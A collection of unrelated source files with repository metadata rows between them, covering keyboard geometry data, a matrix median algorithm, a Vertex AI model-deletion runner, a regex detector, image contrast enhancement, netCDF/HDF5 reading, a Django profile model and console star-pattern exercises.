{ <LCTL>, "MODK", 1, color="grey20" },
{ <LWIN>, "SMOD", 1, color="grey20" },
{ <LALT>, "SMOD", 1, color="grey20" },
{ <SPCE>, "SPCE", 1 },
{ <RALT>, "SMOD", 1, color="grey20" },
{ <RWIN>, "SMOD", 1, color="grey20" },
{ <MENU>, "SMOD", 1, color="grey20" },
{ <RCTL>, "SMOD", 1, color="grey20" }
};
};
}; // End of "Alpha" section
section "Editing" {
key.color= "grey20";
priority= 9;
top= 61;
left= 312;
width= 58;
height= 95;
row {
top= 1;
left= 1;
keys {
{ <INS>, "NORM", 1 }, { <HOME>, "NORM", 1 },
{ <PGUP>, "NORM", 1 }
};
};
row {
top= 20;
left= 1;
keys {
{ <DELE>, "NORM", 1 }, { <END>, "NORM", 1 },
{ <PGDN>, "NORM", 1 }
};
};
row {
top= 58;
left= 20;
keys {
{ <UP>, "NORM", 1 }
};
};
row {
top= 77;
left= 1;
keys {
{ <LEFT>, "NORM", 1 }, { <DOWN>, "NORM", 1 },
{ <RGHT>, "NORM", 1 }
};
};
}; // End of "Editing" section
section "Keypad" {
key.color= "grey20";
priority= 10;
top= 61;
left= 376;
width= 77;
height= 95;
row {
top= 1;
left= 1;
keys {
{ <NMLK>, "NORM", 1 }, { <KPDV>, "NORM", 1 },
{ <KPMU>, "NORM", 1 }, { <KPSU>, "NORM", 1 }
};
};
row {
top= 20;
left= 1;
keys {
{ <KP7>, "NORM", 1, color="white" },
{ <KP8>, "NORM", 1, color="white" },
{ <KP9>, "NORM", 1, color="white" },
{ <KPAD>, "KPAD", 1 }
};
};
row {
top= 39;
left= 1;
keys {
{ <KP4>, "NORM", 1, color="white" },
{ <KP5>, "NORM", 1, color="white" },
{ <KP6>, "NORM", 1, color="white" }
};
};
row {
top= 58;
left= 1;
keys {
{ <KP1>, "NORM", 1, color="white" },
{ <KP2>, "NORM", 1, color="white" },
{ <KP3>, "NORM", 1, color="white" },
{ <KPEN>, "KPAD", 1 }
};
};
row {
top= 77;
left= 1;
keys {
{ <KP0>, "KP0", 1, color="white" },
{ <KPDL>, "NORM", 1, color="white" }
};
};
}; // End of "Keypad" section
solid "LedPanel" {
top= 22;
left= 377;
priority= 0;
color= "grey10";
shape= "LEDS";
};
indicator "Num Lock" {
top= 37;
left= 382;
priority= 1;
onColor= "green";
offColor= "green30";
shape= "LED";
};
indicator "Caps Lock" {
top= 37;
left= 407;
priority= 2;
onColor= "green";
offColor= "green30";
shape= "LED";
};
indicator "Scroll Lock" {
top= 37;
left= 433;
priority= 3;
onColor= "green";
offColor= "green30";
shape= "LED";
};
text "NumLockLabel" {
top= 25;
left= 378;
priority= 4;
width= 19.8;
height= 10;
XFont= "-*-helvetica-medium-r-normal--*-120-*-*-*-*-iso8859-1";
text= "Num\nLock";
};
text "CapsLockLabel" {
top= 25;
left= 403;
priority= 5;
width= 26.4;
height= 10;
XFont= "-*-helvetica-medium-r-normal--*-120-*-*-*-*-iso8859-1";
text= "Caps\nLock";
};
text "ScrollLockLabel" {
top= 25;
left= 428;
priority= 6;
width= 39.6;
height= 10;
XFont= "-*-helvetica-medium-r-normal--*-120-*-*-*-*-iso8859-1";
text= "Scroll\nLock";
};
};
};
"""
# ASCII-encoded bytes form of the sample keymap above, for consumers that
# expect raw bytes rather than str.
sample_keymap_bytes = sample_keymap_string.encode('ascii')
| 33.127153 | 126 | 0.469163 | 6,053 | 65,393 | 4.98381 | 0.178094 | 0.047801 | 0.035138 | 0.042165 | 0.520304 | 0.486757 | 0.407333 | 0.34846 | 0.313952 | 0.290881 | 0 | 0.080727 | 0.385301 | 65,393 | 1,973 | 127 | 33.143943 | 0.669751 | 0.005475 | 0 | 0.423057 | 0 | 0.004117 | 0.998524 | 0.156704 | 0 | 0 | 0.00203 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
281e2a6c2c9796dd0389a1453cf54aee5ed53076 | 671 | py | Python | BinarySearchProbs/MedianofSortedMatrix.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 12 | 2021-06-18T16:24:27.000Z | 2021-11-04T03:30:00.000Z | BinarySearchProbs/MedianofSortedMatrix.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 32 | 2021-10-01T07:15:00.000Z | 2021-11-05T15:35:53.000Z | BinarySearchProbs/MedianofSortedMatrix.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 21 | 2021-09-29T09:16:31.000Z | 2021-10-30T10:06:21.000Z | class Solution:
# @param A : list of list of integers
# @return an integer
def cnt(self, A, mid):
l = 0
r = len(A)-1
while l <= r:
m = (l+r)//2
if A[m] <= mid:
l = m+1
else:
r = m-1
return l
def findMedian(self, A):
l = 1
r = 1000000000
n = len(A)
m = len(A[0])
while l <= r:
mid = (l+r)//2
ct = 0
for i in range(n):
ct += self.cnt(A[i], mid)
if ct <= (n*m)//2:
l = mid+1
else:
r = mid-1
return l
| 21.645161 | 41 | 0.33234 | 92 | 671 | 2.423913 | 0.347826 | 0.035874 | 0.06278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071895 | 0.543964 | 671 | 30 | 42 | 22.366667 | 0.656863 | 0.080477 | 0 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
28228759e8f9c568f55cbfdd7c6f7062096eb04c | 182 | py | Python | dearpypixl/appitems/__init__.py | Atlamillias/pixl-engine | c4217a3a65e01e49d05bf7f07946d65484f6e1da | [
"MIT"
] | 6 | 2021-08-28T03:22:19.000Z | 2021-10-14T22:04:04.000Z | dearpypixl/appitems/__init__.py | Atlamillias/pixl-engine | c4217a3a65e01e49d05bf7f07946d65484f6e1da | [
"MIT"
] | 1 | 2021-07-29T16:51:28.000Z | 2021-08-03T00:24:11.000Z | dearpypixl/appitems/__init__.py | Atlamillias/pixl-engine | c4217a3a65e01e49d05bf7f07946d65484f6e1da | [
"MIT"
] | null | null | null | __all__ = [
'plotting',
'misc',
'colors',
'tables',
'nodes',
'containers',
'values',
'basic',
'textures',
'drawing',
]
__version__ = '1.1.1'
| 12.133333 | 21 | 0.472527 | 15 | 182 | 5.2 | 0.866667 | 0.051282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024194 | 0.318681 | 182 | 14 | 22 | 13 | 0.604839 | 0 | 0 | 0 | 0 | 0 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2824b9b4c3119f16a82e3625c2b09e34cda89cca | 2,013 | py | Python | components/google-cloud/google_cloud_pipeline_components/container/v1/gcp_launcher/delete_model_remote_runner.py | richardsliu/pipelines | ff99a9877195a028425c5bdf3d3ce4ecbe5d8f9f | [
"Apache-2.0"
] | 1 | 2021-12-20T15:47:41.000Z | 2021-12-20T15:47:41.000Z | components/google-cloud/google_cloud_pipeline_components/container/v1/gcp_launcher/delete_model_remote_runner.py | richardsliu/pipelines | ff99a9877195a028425c5bdf3d3ce4ecbe5d8f9f | [
"Apache-2.0"
] | null | null | null | components/google-cloud/google_cloud_pipeline_components/container/v1/gcp_launcher/delete_model_remote_runner.py | richardsliu/pipelines | ff99a9877195a028425c5bdf3d3ce4ecbe5d8f9f | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 The Kubeflow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import re
from .utils import json_util
from . import lro_remote_runner
# Regex for fully-qualified Vertex AI model resource names; the named groups
# expose the project, location and model-id segments of the name.
_MODEL_NAME_TEMPLATE = r'(projects/(?P<project>.*)/locations/(?P<location>.*)/models/(?P<modelid>.*))'
def delete_model(
    type,
    project,
    location,
    payload,
    gcp_resources,
):
  """Delete a Vertex AI model and poll the resulting long-running operation.

  Sends the delete request through the Vertex AI REST endpoint for the
  model's own location and blocks until the LRO reaches a final state.

  Args:
    type: Launcher resource type (part of the launcher contract; unused here).
    project: GCP project (unused; the project is embedded in the model name).
    location: Default location; superseded by the location parsed out of the
      model resource name.
    payload: JSON string containing the DeleteModelRequest, including the
      fully-qualified 'model' resource name.
    gcp_resources: Path where the LRO resource is recorded for tracking.

  Raises:
    ValueError: if the model resource name does not match the expected
      ``projects/.../locations/.../models/...`` pattern.
  """
  # TODO(IronPan) temporarily remove the empty fields from the spec
  request = json_util.recursive_remove_empty(json.loads(payload, strict=False))
  model_name = request['model']

  # The authoritative location is the one embedded in the model name.  When
  # the pattern does not match, re returns None and .group raises
  # AttributeError, which we translate into a descriptive ValueError.
  match = re.compile(_MODEL_NAME_TEMPLATE).match(model_name)
  try:
    location = match.group('location')
  except AttributeError:
    # TODO(ruifang) propagate the error.
    raise ValueError('Invalid model name: {}. Expect: {}.'.format(
        model_name,
        'projects/[project_id]/locations/[location]/models/[model_id]'
    ))

  delete_model_url = (
      f"https://{location}-aiplatform.googleapis.com/v1/{model_name}")

  runner = lro_remote_runner.LroRemoteRunner(location)
  lro = runner.create_lro(delete_model_url, '', gcp_resources, 'delete')
  runner.poll_lro(lro=lro)
| 36.6 | 102 | 0.719324 | 269 | 2,013 | 5.197026 | 0.524164 | 0.070815 | 0.042918 | 0.02289 | 0.037196 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005471 | 0.182812 | 2,013 | 54 | 103 | 37.277778 | 0.844377 | 0.375559 | 0 | 0 | 0 | 0 | 0.221771 | 0.156783 | 0 | 0 | 0 | 0.018519 | 0 | 1 | 0.032258 | false | 0 | 0.129032 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
282a6772fc5117dcd7fca3cb5e228755129685aa | 3,800 | py | Python | tgt_grease/enterprise/Detectors/regex.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 44 | 2017-09-29T00:53:44.000Z | 2020-12-20T13:43:49.000Z | tgt_grease/enterprise/Detectors/regex.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 39 | 2017-09-29T10:26:10.000Z | 2019-05-02T21:07:59.000Z | tgt_grease/enterprise/Detectors/regex.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 26 | 2017-09-28T18:00:39.000Z | 2021-10-17T15:14:39.000Z | from tgt_grease.enterprise.Model import Detector
import re
class Regex(Detector):
    """Regular Expression Detector for GREASE Detection

    A Typical Regex configuration looks like this::

        {
            ...
            'logic': {
                'Regex': [
                    {
                        'field': String, # <-- Field to search for
                        'pattern': String, # <-- Regex to perform on field
                        'variable': Boolean, # <-- OPTIONAL, if true then create a context variable of result
                        'variable_name: String # <-- REQUIRED IF variable, name of context variable
                    }
                    ...
                ]
                ...
            }
        }

    """

    def processObject(self, source, ruleConfig):
        """Evaluate every configured regex block against *source*.

        Data returned in the second parameter from this method should be in this form::

            {
                '<field>': Object # <-- if specified as a variable then return the key->Value pairs
                ...
            }

        Args:
            source (dict): Source Data
            ruleConfig (list[dict]): Rule Configuration Data

        Return:
            tuple: first element boolean for success; second dict for any fields returned as variables
        """
        # Guard-clause style: bail out immediately on any malformed input or
        # any logical block that fails, mirroring the original semantics.
        if not isinstance(source, dict):
            return False, {}
        if not isinstance(ruleConfig, list):
            return False, {}
        collected = {}
        matched = False
        for logicBlock in ruleConfig:
            if not isinstance(logicBlock, dict):
                self.ioc.getLogger().error(
                    "INVALID REGEX LOGICAL BLOCK! NOT TYPE LIST [{0}]".format(str(type(logicBlock))),
                    notify=False
                )
                return False, {}
            field = logicBlock.get('field')
            if field not in source:
                self.ioc.getLogger().trace(
                    "Field not found in source [{0}]".format(field),
                    notify=False,
                    verbose=True
                )
                return False, {}
            value = source.get(field)
            if not value:
                # truthy false field value
                self.ioc.getLogger().trace(
                    "Field [{0}] equates to false [{1}]".format(
                        field,
                        value
                    ),
                    notify=False,
                    verbose=True
                )
                return False, {}
            hits = re.findall(logicBlock.get('pattern'), str(value))
            if not hits:
                self.ioc.getLogger().trace(
                    "Field did not pass regex",
                    verbose=True
                )
                return False, {}
            matched = True
            # Only expose the findall result when the block asks for a
            # named context variable; otherwise the match just counts.
            if logicBlock.get('variable') and logicBlock.get('variable_name'):
                collected[str(logicBlock.get('variable_name'))] = hits
        return matched, collected
282becac560cf6bd87e19b0f2d06b4f86cfdff73 | 479 | py | Python | Classifier/preprocess/contrast_enhansement.py | withanageyasiru/diabetic-retinopathy-detection | 40b0dfe3d8010b475ff243d8f575a003ba01b004 | [
"MIT"
] | null | null | null | Classifier/preprocess/contrast_enhansement.py | withanageyasiru/diabetic-retinopathy-detection | 40b0dfe3d8010b475ff243d8f575a003ba01b004 | [
"MIT"
] | null | null | null | Classifier/preprocess/contrast_enhansement.py | withanageyasiru/diabetic-retinopathy-detection | 40b0dfe3d8010b475ff243d8f575a003ba01b004 | [
"MIT"
] | null | null | null | import cv2
def contrast_enhancement(images):
'''
:param images:
:return:
creating a Histograms Equalization
of a image using cv2.equalizeHist()
'''
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
for i in range(images.shape[0]):
images[i, :, :, 0] = clahe.apply(images[i, :, :, 0])
images[i, :, :, 1] = clahe.apply(images[i, :, :, 1])
images[i, :, :, 2] = clahe.apply(images[i, :, :, 2])
return images
| 23.95 | 63 | 0.565762 | 61 | 479 | 4.42623 | 0.491803 | 0.155556 | 0.177778 | 0.188889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039106 | 0.25261 | 479 | 19 | 64 | 25.210526 | 0.715084 | 0.196242 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
282f31b83b088bf22def0023e6d5c332f78340c1 | 1,019 | py | Python | lecture05_scientific_netcdf.py | cgalli/ATMOS_6910_2018 | baff60990bb4cda4c7f469bc3efa4adba185cbb5 | [
"MIT"
] | 2 | 2019-08-19T14:34:51.000Z | 2019-09-11T05:23:36.000Z | lecture05_scientific_netcdf.py | cgalli/ATMOS_6910_2018 | baff60990bb4cda4c7f469bc3efa4adba185cbb5 | [
"MIT"
] | null | null | null | lecture05_scientific_netcdf.py | cgalli/ATMOS_6910_2018 | baff60990bb4cda4c7f469bc3efa4adba185cbb5 | [
"MIT"
] | null | null | null | import numpy as np
from netCDF4 import Dataset
import matplotlib.pyplot as plt
import h5py
#from pyhdf.SD import SD,SDC
nc_f='/uufs/chpc.utah.edu/common/home/mace-group3/arm/grw/grwvceil25kM1.b1/2010/grwvceil25kM1.b1.20100828.000008.cdf'
nc_fid=Dataset(nc_f,'r')
print nc_fid.file_format
print nc_fid.dimensions.keys()
print nc_fid.dimensions['time']
print nc_fid.variables.keys()
print nc_fid.variables['first_cbh']
base_time=nc_fid.variables['base_time'][:]
first_cbh=nc_fid.variables['first_cbh'][:]
print base_time
fig=plt.figure()
hdf_f='/uufs/chpc.utah.edu/common/home/mace-group4/gpm/GPM_L2/GPM_2AKa.05/2018/010/2A.GPM.Ka.V7-20170308.20180110-S072245-E085520.021977.V05A.HDF5'
f=h5py.File(hdf_f,'r')
f.keys()
group1=f.get('MS')
print group1.items()
lat=group1.get('Latitude')
print lat
print(lat[0:10,0:10])
np.array(lat).shape
f.close
#hdf_f='/uufs/chpc.utah.edu/common/home/mace-group4/modis/MYD06_L2/2008/092/MYD06_L2.A2008092.0210.006.2013344194530.hdf'
#file=SD(hdf_f,SDC.READ)
#print file.info()
| 25.475 | 147 | 0.774289 | 186 | 1,019 | 4.107527 | 0.456989 | 0.052356 | 0.065445 | 0.051047 | 0.198953 | 0.141361 | 0.141361 | 0.141361 | 0.102094 | 0.102094 | 0 | 0.136743 | 0.059863 | 1,019 | 39 | 148 | 26.128205 | 0.660752 | 0.183513 | 0 | 0 | 0 | 0.08 | 0.354369 | 0.302184 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.16 | null | null | 0.36 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
283171f5d0ff85faf12bc71df8c82dee608db1c8 | 1,629 | py | Python | tests/unit/dev_support.py | CCI-MOC/hil | 8c6de2214ddf908c01549b117d5684ac52a93934 | [
"ECL-2.0",
"Apache-2.0"
] | 23 | 2016-09-27T18:41:46.000Z | 2021-12-20T15:06:32.000Z | tests/unit/dev_support.py | CCI-MOC/hil | 8c6de2214ddf908c01549b117d5684ac52a93934 | [
"ECL-2.0",
"Apache-2.0"
] | 522 | 2016-06-22T21:19:26.000Z | 2020-11-12T20:54:40.000Z | tests/unit/dev_support.py | CCI-MOC/hil | 8c6de2214ddf908c01549b117d5684ac52a93934 | [
"ECL-2.0",
"Apache-2.0"
] | 30 | 2016-06-24T08:27:59.000Z | 2018-08-20T17:34:45.000Z | """Test the hil.dev_support module."""
from hil.dev_support import no_dry_run
import pytest
from hil.test_common import fail_on_log_warnings, config_merge
# Re-wrap the imported helper as an autouse pytest fixture so it runs for
# every test in this module automatically.
fail_on_log_warnings = pytest.fixture(autouse=True)(fail_on_log_warnings)
# We test two ways of using the decorator: applying it to a freestanding
# function, and applying it to an instance method.
def _function():
    """Helper which applies no_dry_run to a free-standing function."""
    @no_dry_run
    def probe():
        """Fail unconditionally so callers can tell whether the body ran."""
        assert False
    probe()
def _method():
    """Helper which applies no_dry_run to an instance method."""
    class Carrier:
        """Throwaway class carrying the decorated method."""
        @no_dry_run
        def method(self):
            """Fail unconditionally so callers can tell whether the body ran."""
            assert False
    Carrier().method()
# We test the decorator both with the option enabled and with it disabled.
def _dry(target):
    """Invoke ``target`` with the dry_run option switched on."""
    config_merge({'devel': {'dry_run': 'True'}})
    target()
def _wet(target):
    """Invoke ``target`` with dry_run off; the decorated body must run and fail."""
    config_merge({'devel': {'dry_run': None}})
    with pytest.raises(AssertionError):
        target()
# Actual test cases:
def test_dry_function():
    """With dry_run on, the decorated function body is skipped."""
    _dry(_function)
def test_wet_function():
    """With dry_run off, the decorated function body runs (and asserts)."""
    _wet(_function)
def test_dry_method():
    """With dry_run on, the decorated method body is skipped."""
    _dry(_method)
def test_wet_method():
    """With dry_run off, the decorated method body runs (and asserts)."""
    _wet(_method)
| 23.271429 | 74 | 0.655003 | 237 | 1,629 | 4.278481 | 0.295359 | 0.076923 | 0.039448 | 0.050296 | 0.274162 | 0.230769 | 0.106509 | 0.106509 | 0 | 0 | 0 | 0 | 0.224064 | 1,629 | 69 | 75 | 23.608696 | 0.802215 | 0.427256 | 0 | 0.225806 | 0 | 0 | 0.032221 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 1 | 0.322581 | false | 0 | 0.096774 | 0 | 0.451613 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2834596b9d349b96e4b8df7103de99840f6327ce | 3,034 | py | Python | perrot/plot/labels.py | labqui/perrot | 3b49574861aeb8ce57a9a030f737bc49bc8ab9d5 | [
"MIT"
] | null | null | null | perrot/plot/labels.py | labqui/perrot | 3b49574861aeb8ce57a9a030f737bc49bc8ab9d5 | [
"MIT"
] | null | null | null | perrot/plot/labels.py | labqui/perrot | 3b49574861aeb8ce57a9a030f737bc49bc8ab9d5 | [
"MIT"
] | null | null | null | # Created byMartin.cz
# Copyright (c) Martin Strohalm. All rights reserved.
from pero.properties import *
from pero import Label, LabelBox
from . graphics import InGraphics
class Labels(InGraphics):
    """
    Container glyph that renders a whole collection of labels in one pass,
    honoring each label's 'z_index' ordering.

    Unless 'overlap' is enabled, labels whose bounding boxes collide are
    resolved so that the label with the higher 'z_index' is the one drawn.
    Labels whose anchor coordinates fall outside the frame are skipped
    entirely, while labels only partially outside the clipping frame are
    shifted back so they remain fully visible.

    Properties:

        items: (pero.Label,), None or UNDEF
            Specifies a collection of labels to draw.

        overlap: bool
            Specifies whether the labels can overlap each other (True) or
            should be skipped automatically if there is not enough space
            available (False).

        spacing: int, float
            Specifies the minimum additional space between adjacent labels.

        padding: int, float, (int,), (float,) or UNDEF
            Specifies the inner space as a single value or values for
            individual sides starting from top. This is used in addition to
            the 'clip' to shift partially visible labels.
    """

    items = ListProperty(UNDEF, types=(Label,), dynamic=False)
    overlap = BoolProperty(False, dynamic=False)
    spacing = NumProperty(4, dynamic=False)
    padding = QuadProperty(5, dynamic=False)


    def __init__(self, **overrides):
        """Initializes a new instance of Labels."""

        super().__init__(**overrides)
        self._glyph = LabelBox()


    def initialize(self, canvas, plot):
        """
        This method is automatically called by parent plot to set specific
        properties and perform necessary initialization steps.
        """

        # nothing to collect for an invisible container
        if not self.visible:
            return

        # gather labels from every visible series that exposes them
        collected = []
        for series in plot.series:
            if series.visible and series.show_labels:
                collected.extend(series.get_labels())
        self.items = collected


    def draw(self, canvas, source=UNDEF, **overrides):
        """Uses given canvas to draw the labels."""

        # skip drawing when hidden
        if not self.is_visible(source, overrides):
            return

        # clipping frame for the label box
        frame = self.get_property('frame', source, overrides)

        # delegate the actual layout and drawing to the LabelBox glyph
        self._glyph.set_properties_from(self, source=source, overrides=overrides)
        self._glyph.draw(canvas, clip=frame)
| 32.978261 | 81 | 0.62294 | 360 | 3,034 | 5.197222 | 0.447222 | 0.025655 | 0.017103 | 0.017103 | 0.024586 | 0.024586 | 0 | 0 | 0 | 0 | 0 | 0.00096 | 0.313448 | 3,034 | 91 | 82 | 33.340659 | 0.897264 | 0.536585 | 0 | 0.08 | 0 | 0 | 0.004078 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.12 | 0 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
28359c255234b4110fde32516cbfcf088b1a150b | 764 | py | Python | users/models.py | arianmotti/story-contest | 2c5050b609f707e5aadfa2a0c46fb8dcd70af944 | [
"MIT"
] | 3 | 2021-10-14T05:26:22.000Z | 2022-02-24T20:42:10.000Z | users/models.py | arianmotti/story-contest | 2c5050b609f707e5aadfa2a0c46fb8dcd70af944 | [
"MIT"
] | null | null | null | users/models.py | arianmotti/story-contest | 2c5050b609f707e5aadfa2a0c46fb8dcd70af944 | [
"MIT"
] | 1 | 2022-03-09T17:28:49.000Z | 2022-03-09T17:28:49.000Z | from django.db import models
from django.contrib.auth.models import User
from PIL import Image
from django.core.files.storage import default_storage
class Profile(models.Model):
    """One-to-one extension of Django's User carrying an avatar image."""

    # Deleting the user cascades to its profile.
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    image = models.ImageField(default='default.jpg', upload_to='profile_pics')

    def __str__(self):
        return f'{self.user.username} Profile'

    def save(self, *args, **kwargs):
        """Persist the profile, then shrink oversized avatars to <= 300x300."""
        super(Profile, self).save(*args, **kwargs)
        # Open through the storage backend rather than a raw filesystem path.
        fh = default_storage.open(self.image.name, 'r+b')
        try:
            img = Image.open(fh)
            if img.height > 300 or img.width > 300:
                img.thumbnail((300, 300))
                # NOTE(review): PIL writes to a local path here; with a remote
                # storage backend this should write back through
                # `default_storage` instead - confirm deployment setup.
                img.save(self.image.name)
        finally:
            # fix: the storage file handle was never closed (resource leak)
            fh.close()
| 34.727273 | 83 | 0.64267 | 100 | 764 | 4.8 | 0.49 | 0.0625 | 0.054167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020725 | 0.242147 | 764 | 21 | 84 | 36.380952 | 0.80829 | 0 | 0 | 0 | 0 | 0 | 0.070681 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.235294 | 0.058824 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
28368bf8fb725a2c95f66d1426103ed339df3f07 | 1,638 | py | Python | Compilation star patterns.py | Ranjul-Arumadi/Coding-Problems | c43f33743d469128a0987767b9ee06f236be7562 | [
"MIT"
] | null | null | null | Compilation star patterns.py | Ranjul-Arumadi/Coding-Problems | c43f33743d469128a0987767b9ee06f236be7562 | [
"MIT"
] | 1 | 2021-07-16T11:32:19.000Z | 2021-07-16T11:32:19.000Z | Compilation star patterns.py | Ranjul-Arumadi/Coding-Problems | c43f33743d469128a0987767b9ee06f236be7562 | [
"MIT"
] | 2 | 2021-07-16T11:24:40.000Z | 2021-07-16T11:47:36.000Z | '''
Q: Popular star patterns
Pattern 1:
*
**
***
****
*****
******
Pattern 2:
* * * * * *
* * * * *
* * * *
* * *
* *
*
Pattern 3:
*
***
*****
*******
*********
Pattern 4:
*
* *
* *
* *
* *
* * * * * *
Notes:
------
Usually the outer for loop determines the height of the pattern
Output screenshot: https://github.com/Ranjul-Arumadi/Coding-Problems/blob/main/Output%20Screenshots/patterns.jpg
'''
'''*-------------------------Solution in python-------------------------'''
def right_triangle(rows=7):
    """Pattern 1: a left-aligned right triangle of stars.

    Matches the original output exactly: the first printed line is empty
    (zero stars), then 1..rows-1 stars per line.
    """
    for width in range(rows):
        print('*' * width)


def inverted_triangle(rows=6):
    """Pattern 2: an inverted triangle; each star is followed by a space."""
    for width in range(rows, 0, -1):
        print('* ' * width)


def tree(height):
    """Pattern 3: a solid tree - each line is indented one less and 2 stars wider."""
    width = 1
    for pad in range(height, 0, -1):
        print(' ' * pad + '*' * width)
        width += 2


def hollow_tree(height):
    """Pattern 4: a hollow tree - only the outline stars are printed."""
    gap = 1        # spaces between the two edge stars on interior lines
    first = True   # the apex line has a single star and no gap
    for pad in range(height, 0, -1):
        print(' ' * pad + '*', end='')
        if pad == 1:
            # Base line: ' *' repeated across the full width, no newline.
            # The original called exit() here; returning preserves the exact
            # printed output while keeping the function reusable.
            print(' *' * (height - 1), end='')
            return
        if not first:
            print(' ' * gap + '*', end='')
            gap += 2
        print()
        first = False


def main():
    """Reproduce the original script's behaviour, pattern by pattern."""
    right_triangle()
    inverted_triangle()
    print('Enter tree height: ', end='')
    tree(int(input()))
    print('Enter tree height: ', end='')
    hollow_tree(int(input()))


if __name__ == '__main__':
    main()
